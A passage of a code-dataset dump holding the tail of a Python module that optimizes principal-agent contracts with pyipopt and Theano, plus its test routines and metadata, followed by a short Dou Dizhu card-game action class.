= [[] for i in range(self.num_agents)]\n # e_stars_g_a[i][k] is the gradient of the optimal effort of agent i\n # type k with respect to aas[i][k]\n e_stars_g_a = [[] for i in range(self.num_agents)]\n # exp_u_pi_e_stars[i][k] is the expected utility of agent i type k\n # at e_stars[i][k] using transfer parameters aas[i][k]\n exp_u_pi_e_stars = [[] for i in range(self.num_agents)]\n count_as = 0\n for i in range(self.num_agents):\n ag_i = self.agents[i]\n a_i = a[count_as:count_as + self.t.num_a * ag_i.num_types]\n count_as += self.t.num_a * ag_i.num_types\n for k in range(ag_i.num_types):\n a_ik = a_i[k * self.t.num_a:(k+1) * self.t.num_a]\n aas[i].append(a_ik)\n res_ik = self._irc[i][k].evaluate(a_ik)\n e_stars[i].append(res_ik['e_star'])\n e_stars_g_a[i].append(res_ik['e_star_g_a'])\n exp_u_pi_e_stars[i].append(res_ik['exp_u_pi_e_star'])\n res['exp_u_pi_agents'] = exp_u_pi_e_stars\n # Flatten the list in order to pass them to the functions\n e_stars_f = flatten(e_stars)\n aas_f = flatten(aas)\n e_stars_ga_f = flatten(e_stars_g_a)\n # Evaluate the expected utility of the principal\n exp_u_pi_0 = self._exp_u_raw(*(e_stars_f + aas_f))\n res['exp_u_pi_0'] = exp_u_pi_0\n res['e_stars'] = e_stars_f\n # Evaluate derivative of exp_u_pi_0 with respect to e at e_stars and a\n exp_u_pi_0_raw_g_e = self._exp_u_raw_g_e(*(e_stars_f + aas_f))\n # Evaluate derivative of exp_u_pi_0 with respect to a at e_stars and a\n exp_u_pi_0_raw_g_a = self._exp_u_raw_g_a(*(e_stars_f + aas_f))\n # Evaluate the total derivative of exp_u_pi_0 wrt a's at e_stars and a\n d_exp_u_da_list = []\n num_agent_types = np.sum([a.num_types for a in self._agents])\n tmp = np.zeros((self.num_param,))\n for i in range(num_agent_types):\n part1 = exp_u_pi_0_raw_g_e[i] * e_stars_ga_f[i]\n part2 = exp_u_pi_0_raw_g_a[i]\n d_exp_u_da_list += [part1 + part2]\n res['d_exp_u_pi_0_da'] = np.hstack(d_exp_u_da_list)\n return res\n\n def optimize_contract(self, *args):\n \"\"\"\n Returns the optimal contract.\n \"\"\"\n # Optimization bounds\n # bnds = np.array([(0.0, 2.0) for _ in range(self.num_param)])\n\n n_bnds = self.num_param // self.t.num_a\n if self.t.num_a == 4:\n bnds = np.array([(0.0, 0.05), (0.0001, .5), (0.7, 1.5), (0.0, .6)]*n_bnds)\n else:\n bnds = np.array([(0.0, 0.05), (0.0001, .8), (0.7, 1.5)]*n_bnds)\n\n # The objective function \n def obj_fun(a, obj):\n res = obj.evaluate(a)\n return -res['exp_u_pi_0'], -res['d_exp_u_pi_0_da']\n\n # The participation constraints\n def part_const(a, irc_ik, i, k, num_types, num_a, count_as):\n # Extract the part of a that is relevant\n a_i = a[count_as:count_as + num_a * num_types]\n a_ik = a_i[k * num_a:(k+1) * num_a]\n res_ik = irc_ik.evaluate(a_ik)\n return res_ik['exp_u_pi_e_star']\n\n # The incentive compatibility constraints\n def inc_comp_const(a, irc_ik, i, k, kf, \n num_types, num_a, count_as):\n # Extract the part of a that is relevant\n a_i = a[count_as:count_as + num_a * num_types]\n a_ik = a_i[k * num_a:(k+1) * num_a]\n a_ikf = a_i[kf * num_a:(kf+1) * num_a]\n res_ik = irc_ik.evaluate(a_ik)\n res_ikf = irc_ik.evaluate(a_ikf)\n # res_ik >= res_ikf\n return res_ik['exp_u_pi_e_star'] - res_ikf['exp_u_pi_e_star']\n\n # The Jacobian of the participation constraint\n def part_const_jac(a, irc_ik, i, k, num_types, num_a, count_as):\n a_i = a[count_as:count_as + num_a * num_types]\n a_ik = a_i[k * num_a:(k+1) * num_a]\n res_ik = irc_ik.evaluate(a_ik)\n jac_ik = res_ik['exp_u_pi_e_star_g_a']\n jac = np.zeros(a.shape)\n jac[count_as + num_a * k:count_as + num_a * (k + 1)] = jac_ik \n return jac\n\n # The 
incentive compatibility constraints\n def inc_comp_const_jac(a, irc_ik, i, k, kf, \n num_types, num_a, count_as):\n # Extract the part of a that is relevant\n a_i = a[count_as:count_as + num_a * num_types]\n a_ik = a_i[k * num_a:(k+1) * num_a]\n a_ikf = a_i[kf * num_a:(kf+1) * num_a]\n res_ik = irc_ik.evaluate(a_ik)\n res_ikf = irc_ik.evaluate(a_ikf)\n jac_ik = res_ik['exp_u_pi_e_star_g_a']\n jac_ikf = res_ikf['exp_u_pi_e_star_g_a']\n jac = np.zeros(a.shape)\n jac[count_as + num_a * k:count_as + num_a * (k + 1)] = jac_ik \n jac[count_as + num_a * kf:count_as + num_a * (kf + 1)] = -jac_ikf\n return jac\n\n def eval_f(a, user_data=None):\n res = self.evaluate(a)\n return -res['exp_u_pi_0']\n\n def eval_grad_f(a, user_data=None):\n res = self.evaluate(a)\n return np.array(-res['d_exp_u_pi_0_da']).flatten()\n\n def eval_g(x, user_data=None):\n part_cons = []\n count_as = 0\n for i in range(self.num_agents):\n ag_i = self.agents[i]\n for k in range(ag_i.num_types):\n con = part_const(x, self._irc[i][k], i, k,\n ag_i.num_types, self.t.num_a,\n count_as)\n part_cons.append(con)\n count_as += self.t.num_a * ag_i.num_types\n count_as = 0\n for i in range(self.num_agents):\n ag_i = self.agents[i]\n for k in range(ag_i.num_types):\n for kf in range(ag_i.num_types):\n if kf != k:\n con = inc_comp_const(x, self._irc[i][k],i,\n k, kf, ag_i.num_types,\n self.t.num_a, count_as)\n part_cons.append(con)\n count_as += self.t.num_a * ag_i.num_types\n return np.array(part_cons).flatten()\n\n nvar = self.num_param\n x_L = np.array(bnds[:,0], dtype=np.float_)\n x_U = np.array(bnds[:,1], dtype=np.float_)\n test = np.array(np.zeros(nvar))\n self.ncon = eval_g(test).shape[0]\n\n g_L = np.array([0.0]*self.ncon, dtype=np.float_)\n g_U = np.array([pow(10.0,20)]*self.ncon, dtype=np.float_)\n\n def eval_jac_g(x, flag, user_data=None):\n if flag:\n return (np.array([[_]*self.num_param for _ in range(self.ncon)]).flatten(),\n np.array(list(np.arange(self.num_param))*self.ncon))\n else:\n part_cons = []\n count_as = 0\n for i in range(self.num_agents):\n ag_i = self.agents[i]\n for k in range(ag_i.num_types):\n con = part_const_jac(x, self._irc[i][k], \n i, k, ag_i.num_types,\n self.t.num_a, count_as)\n part_cons.append(con)\n count_as += self.t.num_a * ag_i.num_types\n count_as = 0\n for i in range(self.num_agents):\n ag_i = self.agents[i]\n for k in range(ag_i.num_types):\n for kf in range(ag_i.num_types):\n if kf != k:\n con = inc_comp_const_jac(x, \n self._irc[i][k], \n i, k, kf, \n ag_i.num_types, \n self.t.num_a, count_as)\n part_cons.append(con)\n count_as += self.t.num_a * ag_i.num_types\n return np.array(part_cons).flatten()\n\n nlp = pyipopt.create(nvar, x_L, x_U, self.ncon, g_L, g_U,\n self.num_param * self.ncon, nvar**2, eval_f,\n eval_grad_f, eval_g, eval_jac_g)\n nlp.int_option('max_iter', 1000)\n nlp.int_option('print_frequency_iter',100)\n nlp.num_option('tol', 1e-6)\n # nlp.str_option('linear_solver','ma27')\n\n comp = 1.0e99\n x_ret = None\n x0 = np.array(np.zeros(nvar))\n if not args:\n num_restarts = 10\n samples = lhs(self.num_param, samples = num_restarts, criterion = 'c')\n elif len(args) == 1:\n num_restarts = args[0]\n samples = lhs(self.num_param, samples = num_restarts, criterion = 'c')\n else:\n num_restarts_total = args[0]\n samples = args[1]\n ind_seed = np.array(args[2]).flatten()\n samples = samples[ind_seed, :]\n num_restarts = np.array(ind_seed).flatten().shape[0]\n samples = bnds[:,0] + samples*(bnds[:,1]-bnds[:,0])\n final_result = {}\n for i in range(num_restarts):\n print(('restart number:', i+1))\n x0 = samples[i,:]\n x, zl, zu, 
constraint_multipliers, obj, status = nlp.solve(x0)\n print(('status', status))\n if obj < comp:\n comp = obj\n x_ret = x\n print(x)\n final_result['x'] = x_ret\n final_result['obj'] = -obj\n return final_result\n\n # Test optimization\n\n # fun_min = 1e99\n # res_min = None\n # for n in range(num_restarts):\n # a0 = bnds[:, 0] + (bnds[:, 1] - bnds[:, 0]) * np.random.rand(self.num_param)\n # print n\n # try:\n # res = opt.minimize(obj_fun, a0, jac=True, args=(self,), method='slsqp',\n # bounds=bnds, constraints=part_cons, options={'disp':True})\n # if fun_min > res['fun'] and res.success:\n # fun_min = res['fun']\n # res_min = res\n # print res\n # print '*' * 80\n # r = self.evaluate(res_min.x)\n # print 'contract parameters:', res_min.x\n # print r \n # print '*' * 80\n # except:\n # print 'Optimization failed.'\n # return res_min\n\n def _setup_irc(self):\n \"\"\"\n Set up individual rationality constraints.\n \"\"\"\n # Individual rationality constraints (i-k)\n irc = [[] for _ in range(self.num_agents)]\n for i in range(self.num_agents):\n for k in range(self.agents[i].num_types):\n irc[i].append(\n IndividualRationality(self.agents[i].agent_types[k], self.t))\n self._irc = irc\n\n def _agent_type_range(self):\n \"\"\"\n Returns an iterator over all possible combinations of agent types.\n \"\"\"\n return itertools.product(*(list(range(a.num_types)) for a in self.agents))\n\n\n\n @property\n def verbosity(self):\n \"\"\"\n Return the verbosity level of the class.\n \"\"\"\n return self._verbosity\n\n @property\n def exp_u_raw(self):\n \"\"\"\n Get the expected utility of the principal as a Function with inputs\n e_star and the transfer function parameters a.\n \"\"\"\n return self._exp_u_raw\n\n @property\n def exp_u_raw_g_e(self):\n \"\"\"\n Return the derivative of the expected utility of the principal with\n respect to all e_stars as a function of e_star and the transfer\n function parameters a.\n \"\"\"\n return self._exp_u_raw_g_e\n\n @property\n def exp_u_raw_g_a(self):\n \"\"\"\n Return the derivative of the expected utility of the principal with\n respect to all transfer function parameters a as a function of e_star\n and a.\n \"\"\"\n return self._exp_u_raw_g_a\n \n @property\n def num_agents(self):\n \"\"\"\n Get the number of agents.\n \"\"\"\n return len(self.agents)\n\n @property\n def agents(self):\n \"\"\"\n Get the agents.\n \"\"\"\n return self._agents\n\n @property\n def t(self):\n \"\"\"\n Get the transfer function.\n \"\"\"\n return self._t\n\n @property\n def v(self):\n \"\"\"\n Get the value function.\n \"\"\"\n return self._v\n\n @property\n def u(self):\n \"\"\"\n Get the utility function of the principal.\n \"\"\"\n return self._u\n\n @property\n def num_param(self):\n \"\"\"\n Get the total number of transfer function parameters.\n \"\"\"\n return self._num_param\n\n def __repr__(self):\n \"\"\"\n Return a string representation of the class.\n \"\"\"\n return 'PrincipalProblem(v=' + str(self.v) + \\\n ', agents=' + str(self.agents) + \\\n ', t=' + str(self.t) + ')'\n\n\nif __name__ == '__main__':\n from ._quality_functions import *\n from ._cost_functions import *\n from ._utility_functions import *\n from ._transfer_functions import *\n from ._value_functions import *\n import numdifftools as nd\n\n\n # Create an example to test optimize_contract\n\n agent_type11 = AgentType(LinearQualityFunction(2., 0.1), \n QuadraticCostFunction(0.02),\n ExponentialUtilityFunction())\n\n agent_type12 = AgentType(LinearQualityFunction(1.2, 0.3),\n QuadraticCostFunction(0.02),\n 
ExponentialUtilityFunction(.0))\n agents = Agent([agent_type11])\n\n t = RequirementPlusIncentiveTransferFunction(gamma=30.)\n\n p = PrincipalProblem(ExponentialUtilityFunction(),\n RequirementValueFunction(1, gamma=5.),\n agents, t)\n p.compile()\n a = [1.54857533e-06, 8.96740975e-03, 1.21648850e+00, 7.43227452e-03]\n res = p.evaluate(a)\n print(res)\n quit()\n res = p.optimize_contract()\n print('evaluate the variables in the optimum point of the contract')\n print(res)\n print((p.evaluate(res['x'])))\n quit()\n\n\n\n # Create an agent of a specific type\n agent_type11 = AgentType(LinearQualityFunction(1.5, 0.05),\n QuadraticCostFunction(0.0),\n ExponentialUtilityFunction())\n agent_type12 = AgentType(LinearQualityFunction(1.5, 0.2),\n QuadraticCostFunction(0.1),\n ExponentialUtilityFunction(2.0))\n agent_type21 = AgentType(LinearQualityFunction(2.5, 0.1),\n QuadraticCostFunction(0.3),\n ExponentialUtilityFunction(1.5))\n agent_type22 = AgentType(LinearQualityFunction(1.5, 0.3),\n QuadraticCostFunction(0.1),\n ExponentialUtilityFunction(0.0))\n\n # Create the agents\n agent1 = Agent([agent_type11, agent_type12])\n agent2 = Agent([agent_type21, agent_type22])\n agents = [agent1, agent2]\n # Create a transfer function\n t = RequirementPlusIncentiveTransferFunction()\n\n # Create the principal's problem\n p = PrincipalProblem(ExponentialUtilityFunction(0.0),\n RequirementValueFunction(2),\n agents, t)\n\n # Compile everything\n # p.compile()\n\n num_xis = 10000\n xi = np.random.randn(num_xis)\n\n # Test 1: N=1, M=1\n agent_type = AgentType(LinearQualityFunction(2.0, 0.1), \n QuadraticCostFunction(0.02),\n ExponentialUtilityFunction())\n agents = Agent(agent_type)\n t = RequirementPlusIncentiveTransferFunction(gamma = 30.0)\n\n p = PrincipalProblem(ExponentialUtilityFunction(),\n RequirementValueFunction(1, gamma=10.),\n agents, t)\n p.compile()\n q1 = p.agents[0].agent_types[0].q\n v1 = p.v\n t1 = p.t\n q1.compile()\n v1.compile()\n t1.compile()\n a = [1.54857533e-06, 8.96740975e-03, 1.21648850e+00, 7.43227452e-03]\n result = p.evaluate(a)\n print(result)\n quit()\n mc = np.sum(v1(q1(result['e_stars'][0],xi)) - \\\n t1(q1(result['e_stars'][0], xi), a)) / num_xis \n print('Test cases for N=1, M=1:')\n print(('expected utility check for N=1, M=1: Monte Carlo: {}, Collocation: {}'.format(mc, result['exp_u_pi_0'])))\n exp_u = p.exp_u_raw\n exp_u.compile()\n p._setup_irc\n ir1 = p._irc[0][0]\n ir1.compile()\n\n f1 = lambda _a: exp_u(result['e_stars'][0], _a)\n f2 = lambda _e: exp_u(_e, a)\n f3 = lambda _a: ir1.evaluate(_a)['e_star']\n\n gf1 = nd.Gradient(f1)\n gf2 = (f2(result['e_stars'][0]+1.0e-6)-f2(result['e_stars'][0]-1.0e-6))/(2.e-6)\n gf3 = nd.Gradient(f3)\n\n dexp_numerical = gf2 * gf3(a) + gf1(a)\n print(('dE[u]/da11 check for N=1, M=1: Numerical derivative: {}, AD theano: {}'.format(dexp_numerical, result['d_exp_u_pi_0_da'])))\n print('##########')\n # Test2: N=1, M=2\n\n agent_type11 = AgentType(LinearQualityFunction(1.2, 0.2), \n QuadraticCostFunction(0.1),\n ExponentialUtilityFunction(0.0))\n agent_type12 = AgentType(LinearQualityFunction(1.1, 0.3), \n QuadraticCostFunction(0.1),\n ExponentialUtilityFunction(2.0))\n agents = Agent([agent_type11, agent_type12])\n\n t = RequirementPlusIncentiveTransferFunction()\n p = PrincipalProblem(ExponentialUtilityFunction(),\n RequirementValueFunction(1),\n agents, t)\n p.compile()\n\n q1 = p.agents[0].agent_types[0].q\n q2 = p.agents[0].agent_types[1].q\n v1 = p.v\n t1 = p.t\n q1.compile()\n\n q2.compile()\n v1.compile()\n t1.compile()\n\n a1 = 
np.array([0.0, 0.2, 1.0, 0.05])\n a2 = np.array([0.05, 0.3, 1.0, 0.1])\n a = np.concatenate([a1, a2])\n result = p.evaluate(a)\n\n temp1 = 0.5*(v1(q1(result['e_stars'][0],xi)) - \\\n t1(q1(result['e_stars'][0], xi), a1))\n temp2 = 0.5*(v1(q2(result['e_stars'][1],xi)) - \\\n t1(q2(result['e_stars'][1], xi), a2))\n mc = np.sum(temp1 + temp2) / num_xis \n print('Test cases for N=1, M=2')\n print(('expected utility check for N=1, M=2: Monte Carlo: {}, Collocation: {}'.format(mc, result['exp_u_pi_0'])))\n \n exp_u = p.exp_u_raw\n exp_u.compile()\n p._setup_irc\n ir1 = p._irc[0][0]\n ir2 = p._irc[0][1]\n ir1.compile()\n ir2.compile()\n\n f1 = lambda _a1: exp_u(result['e_stars'][0], result['e_stars'][1], _a1, a2)\n f2 = lambda _e1, _e2: exp_u(_e1, _e2, a1, a2)\n f3 = lambda _a: ir1.evaluate(_a)['e_star']\n gf1 = nd.Gradient(f1)\n gf2 = (f2(result['e_stars'][0]+1.0e-6, result['e_stars'][1])-\\\n f2(result['e_stars'][0]-1.0e-6, result['e_stars'][1]))/(2.e-6)\n gf3 = nd.Gradient(f3)\n dexp_numerical = gf2 * gf3(a1) + gf1(a1)\n print(('dE[u]/da_11 check for N=1, M=2: Numerical derivative: {}, AD theano: {}'.format(dexp_numerical, result['d_exp_u_pi_0_da'][0])))\n\n f1 = lambda _a2: exp_u(result['e_stars'][0], result['e_stars'][1], a1, _a2)\n f2 = lambda _e1, _e2: exp_u(_e1, _e2, a1, a2)\n f3 = lambda _a: ir2.evaluate(_a)['e_star']\n gf1 = nd.Gradient(f1)\n gf2 = (f2(result['e_stars'][0], result['e_stars'][1]+1.0e-6)-\\\n f2(result['e_stars'][0], result['e_stars'][1]-1.e-6))/(2.e-6)\n gf3 = nd.Gradient(f3)\n dexp_numerical = gf2 * gf3(a2) + gf1(a2)\n print(('dE[u]/da_12 check for N=1, M=2: Numerical derivative: {}, AD theano: {}'.format(dexp_numerical, result['d_exp_u_pi_0_da'][1])))\n print('##########')\n\n # Test3: N=2, M=1\n\n agent_type11 = AgentType(LinearQualityFunction(1.5, 0.1), \n QuadraticCostFunction(0.2),\n ExponentialUtilityFunction(0.0))\n agent_type21 = AgentType(LinearQualityFunction(1.4, 0.1), \n QuadraticCostFunction(0.1),\n ExponentialUtilityFunction(2.0))\n agent1 = Agent(agent_type11)\n agent2 = Agent(agent_type21)\n agents = [agent1, agent2]\n\n t = RequirementPlusIncentiveTransferFunction()\n p = PrincipalProblem(ExponentialUtilityFunction(),\n RequirementValueFunction(2),\n agents, t)\n p.compile()\n\n q1 = p.agents[0].agent_types[0].q\n q2 = p.agents[1].agent_types[0].q\n v1 = p.v\n t1 = p.t\n q1.compile()\n q2.compile()\n v1.compile()\n t1.compile()\n\n a1 = np.array([0.0, 0.1, 1., 0.05])\n a2 = np.array([0.0, 0.2, 1., 0.0])\n a = np.concatenate([a1, a2])\n result = p.evaluate(a)\n xi_1 = np.random.randn(num_xis)\n xi_2 = np.random.randn(num_xis)\n temp = v1(q1(result['e_stars'][0], xi_1), q2(result['e_stars'][1], xi_2)) - \\\n (t1(q1(result['e_stars'][0], xi_1), a1) + t1(q2(result['e_stars'][1], xi_2), a2))\n mc = np.sum(temp) / num_xis \n print('Test cases for N=2, M=1')\n print(('expected utility check for N=2, M=1: Monte Carlo: {}, Collocation: {}'.format(mc, result['exp_u_pi_0'])))\n quit()\n #[2.58410778e-05 1.00850982e-01 1.41734080e+00 3.03885263e-01]\n #{'d_exp_u_pi_0_da': array([-1. 
, -0.73426853, 0.49732821, -0.08538814]), 'exp_u_pi_agents': [[2.5841077197397968e-05]], 'e_stars': [1.0], 'exp_u_pi_0': array(0.8999723)}\n", "sub_path": "sepdesign/_principal.py", "file_name": "_principal.py", "file_ext": "py", "file_size_in_byte": 29095, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "warnings.warn", "line_number": 25, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 40, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sepdesign._utility_functions.UtilityFunction", "line_number": 61, "usage_type": "argument"}, {"api_name": "sepdesign._value_functions.ValueFunction", "line_number": 63, "usage_type": "argument"}, {"api_name": "sepdesign._agent.Agent", "line_number": 65, "usage_type": "argument"}, {"api_name": "sepdesign._agent.Agent", "line_number": 69, "usage_type": "argument"}, {"api_name": "sepdesign._transfer_functions.TransferFunction", "line_number": 72, "usage_type": "argument"}, {"api_name": "numpy.sum", "line_number": 79, "usage_type": "call"}, {"api_name": "theano.tensor.dvector", "line_number": 105, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 105, "usage_type": "name"}, {"api_name": "theano.tensor.dvector", "line_number": 107, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 107, "usage_type": "name"}, {"api_name": "theano.tensor.scalar", "line_number": 108, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 108, "usage_type": "name"}, {"api_name": "theano.clone", "line_number": 110, "usage_type": "call"}, {"api_name": "theano.clone", "line_number": 113, "usage_type": "call"}, {"api_name": "theano.tensor.zeros", "line_number": 118, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 118, "usage_type": "name"}, {"api_name": "theano.clone", "line_number": 121, "usage_type": "call"}, {"api_name": "theano.tensor.sum", "line_number": 125, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.prod", "line_number": 129, "usage_type": "call"}, {"api_name": "theano.clone", "line_number": 132, "usage_type": "call"}, {"api_name": "design.sparse_grid", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 139, "usage_type": "attribute"}, {"api_name": "theano.clone", "line_number": 140, "usage_type": "call"}, {"api_name": "theano.tensor.dot", "line_number": 145, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 145, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 291, 
"usage_type": "call"}, {"api_name": "numpy.array", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.float_", "line_number": 318, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.float_", "line_number": 319, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.float_", "line_number": 323, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.float_", "line_number": 324, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 354, "usage_type": "call"}, {"api_name": "pyipopt.create", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 366, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 366, "usage_type": "call"}, {"api_name": "pyDOE.lhs", "line_number": 369, "usage_type": "call"}, {"api_name": "pyDOE.lhs", "line_number": 372, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 378, "usage_type": "call"}, {"api_name": "sepdesign._individual_rationality.IndividualRationality", "line_number": 426, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 433, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 532, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 536, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 539, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 560, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 563, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 566, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 569, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 574, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 575, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 589, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 589, "usage_type": "attribute"}, {"api_name": "sepdesign._types.AgentType", "line_number": 592, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 595, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 612, "usage_type": "call"}, {"api_name": "numdifftools.Gradient", "line_number": 626, "usage_type": "call"}, {"api_name": "numdifftools.Gradient", "line_number": 628, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 635, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 638, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 641, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 659, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 660, "usage_type": "call"}, {"api_name": "numpy.concatenate", 
"line_number": 661, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 668, "usage_type": "call"}, {"api_name": "numdifftools.Gradient", "line_number": 683, "usage_type": "call"}, {"api_name": "numdifftools.Gradient", "line_number": 686, "usage_type": "call"}, {"api_name": "numdifftools.Gradient", "line_number": 693, "usage_type": "call"}, {"api_name": "numdifftools.Gradient", "line_number": 696, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 703, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 706, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 709, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 710, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 728, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 729, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 730, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 732, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 732, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 733, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 733, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 736, "usage_type": "call"}]}
+{"seq_id": "344364780", "text": "#! /usr/bin/env python3\n\nfrom log.log import Logger\nimport random\nimport numpy as np\n\nfrom .base_process_action import BaseProcessAction\nfrom common.hand_card_utils import HandCardUtils\nfrom enums.card_type_enum import CardTypeEnum\n\nlogger = Logger.getLog(__file__)\n\nclass ProcessThreeOneStrategy(BaseProcessAction):\n \"\"\"\n E.g. [3334], [4443], [5556], ......\n \"\"\"\n\n def __init__(self, hand_card_status, primary_item, **kwargs):\n super().__init__(hand_card_status, primary_item, **kwargs)\n\n def run(self):\n k = self.kwargs.pop('k', 1)\n exist_card = HandCardUtils.find_even_three(self.hand_card_status, k=k)\n if self.primary_item is not None:\n exist_card = list(filter(lambda x:x > self.primary_item,exist_card))\n if len(exist_card) == 0:\n logger.debug('Can not accept the card')\n return None, None, None\n rnd = random.randint(0,len(exist_card)-1)\n one_card = exist_card[rnd]\n exist_card = [one_card - ix for ix in reversed(range(k))]\n remain_card = self.__flat_card(self.hand_card_status, exist_card)\n if len(remain_card) < k:\n logger.debug('Can not accept the card')\n return None, None, None\n other_card = sorted(random.sample(remain_card, k))\n score = HandCardUtils.value_map(exist_card[-1], CardTypeEnum.CT_THREE_DOU, 3*k+k)\n put_card = list(map(lambda x:[x]*3, exist_card))\n put_card = np.reshape(put_card, (1, -1)).tolist()[0]\n put_card.extend(other_card)\n return put_card, score, exist_card[-1]\n\n def __flat_card(self, card_status, exclude_card):\n \"\"\"\n Flatten these card\n E.g.\n card status is [0,0,0,1,3,2,2,2,0,0,0,0,0,0,0,0,1,0]\n then flatten this is [3,4,4,4,5,5,6,6,7,7,QUEEN]\n \"\"\"\n flat_card = []\n for card, count in enumerate(card_status):\n if card in exclude_card:\n count -= 3\n if count > 0:\n flat_card.extend([card]*count)\n return flat_card\n", "sub_path": "ddz/v1.0/dependency/env_action/process_action_put_three_one.py", "file_name": "process_action_put_three_one.py", "file_ext": "py", "file_size_in_byte": 2055, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "log.log.Logger.getLog", "line_number": 11, "usage_type": "call"}, {"api_name": "log.log.Logger", "line_number": 11, "usage_type": "name"}, {"api_name": "base_process_action.BaseProcessAction", "line_number": 13, "usage_type": "name"}, {"api_name": "common.hand_card_utils.HandCardUtils.find_even_three", "line_number": 23, "usage_type": "call"}, {"api_name": "common.hand_card_utils.HandCardUtils", "line_number": 23, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 29, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 36, "usage_type": "call"}, {"api_name": "common.hand_card_utils.HandCardUtils.value_map", "line_number": 37, "usage_type": "call"}, {"api_name": "common.hand_card_utils.HandCardUtils", "line_number": 37, "usage_type": "name"}, {"api_name": "enums.card_type_enum.CardTypeEnum.CT_THREE_DOU", "line_number": 37, "usage_type": "attribute"}, {"api_name": "enums.card_type_enum.CardTypeEnum", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.reshape", "line_number": 39, "usage_type": "call"}]}
